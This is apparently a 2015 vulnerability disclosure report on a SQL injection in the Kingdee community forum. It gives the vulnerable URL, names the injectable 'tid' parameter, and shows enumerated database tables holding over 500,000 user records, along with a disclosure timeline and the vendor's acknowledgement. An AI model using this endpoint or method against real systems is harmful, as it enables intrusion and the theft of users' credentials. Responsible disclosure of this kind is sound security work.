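2015-09-07: Details reported to the vendor; awaiting vendor handling
2015-09-08: Vendor confirmed; details disclosed to the vendor only
2015-09-18: Details disclosed to core white hats and relevant domain experts
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public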
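As the title says.
The following link on the Kingdee community site is vulnerable to SQL injection; the tid parameter is the injection point.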
http://club.kingdee.com/forum.php?action=recommend&do=subtract&hash=8e01bc2c&mod=misc&tid=1
Sensitive information for more than 500,000 users is exposed, including usernames, passwords, and email addresses.
Database: supesite
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| kuc_members         | 529708  |  <- registered forum users
| tmp2_kuc_members    | 484253  |
| tmp_kuc_members     | 484252  |
| kuc_memberfields    | 482718  |
| u_member            | 429765  |
| ee_group_poll_log   | 339672  |
| ee_group_flower_log | 203568  |
| tmp_members         | 61336   |
| kuc_pms             | 42036   |
| kuc_pm_indexes      | 13329   |
| kuc_pm_members      | 12587   |
| ee_group_fans       | 11615   |
| tmp2_pm_members     | 10170   |
| tmp_pm_members      | 10170   |
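Severity: High
Vulnerability Rank: 18
Confirmed: 2015-09-08 08:50
Thank you for your attention to Kingdee's security. We have notified the relevant department to handle it.
None at this time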